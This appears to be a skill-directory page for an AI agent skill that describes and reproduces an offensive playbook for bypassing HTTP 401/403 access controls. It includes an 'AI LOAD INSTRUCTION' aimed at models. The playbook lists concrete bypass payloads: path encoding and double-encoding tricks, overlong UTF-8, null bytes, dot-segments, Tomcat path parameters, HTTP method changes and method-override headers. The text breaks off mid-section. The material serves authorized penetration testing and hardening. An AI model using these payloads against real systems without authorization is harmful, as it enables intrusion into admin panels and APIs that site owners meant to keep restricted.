401 403 Bypass Techniques
Run a structured 401/403 bypass playbook when authorized testing hits forbidden responses on admin paths or APIs.
Overview
401-403-bypass-techniques is an agent skill for the Ship phase that documents authorized 401/403 forbidden bypass methods across paths, verbs, headers, and protocols.
Install
npx skills add https://github.com/yaklang/hack-skills --skill 401-403-bypass-techniquesWhat is this skill?
- Path manipulation matrix: trailing slash, encoding, normalization, and verb+path combinations
- HTTP method tampering and override headers beyond a single X-Original-URL trick
- Header injection bypasses including X-Forwarded-For and related routing hints
- Protocol downgrade and combination attacks with links to smuggling and Host attacks
- Routing to related skills: auth flaws, WAF bypass, Host header, request smuggling, HTTP/2
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You get access denied on promising endpoints and only remember one or two header tricks, so real ACL gaps stay untested.
Who is it for?
Authorized pentesters, bug-bounty hunters, and indie builders hardening their own SaaS or API gateways before launch.
Skip if: Unauthorized probing of third-party systems, compliance-only checkbox audits with no hands-on testing scope, or replacing formal penetration-test reports.
When should I use this skill?
Encountering access-denied responses on admin panels, API endpoints, or restricted paths during authorized security testing.
What do I get? / Deliverables
You work through a systematic bypass matrix, combine path and verb variants, and know which related auth, WAF, and smuggling skills to invoke next.
- Bypass attempt checklist results
- Documented working path/header/method combinations
- Notes for remediation or WAF tuning
Recommended Skills
Journey fit
How it compares
Offensive playbook for access-control testing—not a WAF vendor integration and not a passive dependency scanner.
Common Questions / FAQ
Who is 401-403-bypass-techniques for?
Security-minded solo builders and testers with explicit authorization who need agent-guided bypass checklists when 401/403 block further assessment.
When should I use 401-403-bypass-techniques?
During Ship security work when admin or API routes return forbidden, before launch on staging, or when validating proxy versus backend path rules after deploy changes.
Is 401-403-bypass-techniques safe to install?
The skill describes active attack techniques; only use in legal scope, limit agent network permissions, and review the Security Audits panel on this Prism page before installing.
SKILL.md
READMESKILL.md - 401 403 Bypass Techniques
# SKILL: 401/403 Bypass Techniques — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Comprehensive 401/403 forbidden bypass techniques. Covers path normalization tricks, HTTP method override, header-based bypasses (X-Original-URL, X-Forwarded-For), protocol version tricks, and combination attacks. Base models typically know 2-3 header bypasses but miss the full matrix of path manipulation variants and verb+path combos. ## 0. RELATED ROUTING - [authbypass-authentication-flaws](../authbypass-authentication-flaws/SKILL.md) — broader auth bypass (login flaws, session handling) - [waf-bypass-techniques](../waf-bypass-techniques/SKILL.md) — when bypass is WAF-specific rather than access control - [http-host-header-attacks](../http-host-header-attacks/SKILL.md) — Host header manipulation for routing bypass - [request-smuggling](../request-smuggling/SKILL.md) — smuggle past access controls entirely - [http2-specific-attacks](../http2-specific-attacks/SKILL.md) — h2c smuggling to bypass proxy ACLs --- ## 1. PATH MANIPULATION BYPASSES The core idea: the reverse proxy/WAF checks one path format, but the backend normalizes differently. ### 1.1 Trailing Slash / Missing Slash ``` /admin → 403 /admin/ → 200 ✓ (trailing slash) /admin/. → 200 ✓ (trailing dot) ``` ### 1.2 Case Sensitivity ``` /admin → 403 /Admin → 200 ✓ /ADMIN → 200 ✓ /aDmIn → 200 ✓ ``` Works when: proxy rule is case-sensitive but backend is case-insensitive (common on Windows/IIS). ### 1.3 URL Encoding ``` /admin → 403 /%61dmin → 200 ✓ (encode 'a') /admi%6e → 200 ✓ (encode 'n') /%61%64%6d%69%6e → 200 ✓ (full encode) ``` ### 1.4 Double URL Encoding ``` /admin → 403 /%2561dmin → 200 ✓ (%25 = %, decoded twice: %61 → a) /admin%252f → 200 ✓ /admin..%252f → 200 ✓ ``` ### 1.5 Unicode / UTF-8 Encoding ``` /admin → 403 /admi%C0%AE → 200 ✓ (overlong UTF-8 for '.') /admi%C0%6E → 200 ✓ (overlong encoding) /%C0%AFadmin → 200 ✓ (overlong '/') ``` ### 1.6 Dot-Segment / Path Traversal ``` /admin → 403 /./admin → 200 ✓ //admin → 200 ✓ /admin/./ → 200 ✓ /.//admin → 200 ✓ /admin..;/ → 200 ✓ (Tomcat path parameter) ``` ### 1.7 Null Byte ``` /admin → 403 /admin%00 → 200 ✓ /admin%00.json → 200 ✓ /%00/admin → 200 ✓ ``` ### 1.8 Path Parameter Injection ``` /admin → 403 /admin;foo=bar → 200 ✓ (Tomcat/Java treats ; as path param) /admin; → 200 ✓ /admin;x → 200 ✓ ``` ### 1.9 Trailing Special Characters ``` /admin%20 (space) /admin%09 (tab) /admin? (empty query) /admin.json /admin.html /admin/~ ``` ### 1.10 Backslash (Windows/IIS) ``` /admin\ /admin\..\/ \..\admin ``` ### 1.11 Combined Path Tricks ``` ///admin/// /./admin/./ /admin/..;/admin (Tomcat) /%2e/admin ``` --- ## 2. HTTP METHOD BYPASS ### 2.1 Direct Method Change ``` GET /admin → 403 POST /admin → 200 ✓ PUT /admin → 200 ✓ PATCH /admin → 200 ✓ DELETE /admin → 200 ✓ OPTIONS /admin → 200 ✓ (may leak allowed methods) TRACE /admin → 200 ✓ (may reflect headers — XST) HEAD /admin → 200 ✓ (same as GET but no body — confirms access) ``` ### 2.2 Method Override Headers When the proxy blocks by method, but the backend reads override headers: ```http GET /admin HTTP/1.1 X-HTTP-Method-Override: PUT GET /admin HTTP/1.1 X-Method-Override: POST GET /admin HTTP/1.1 X-HTTP-Method: DELETE POST /admin HTTP/1.1 X-HTTP-Method-Override: PATCH _method=PUT (in POST body — Rails, Laravel) ``` ### 2.3 Custom / Invalid Methods ``` FOOBAR /admin HTTP/1.1 → some ACLs only check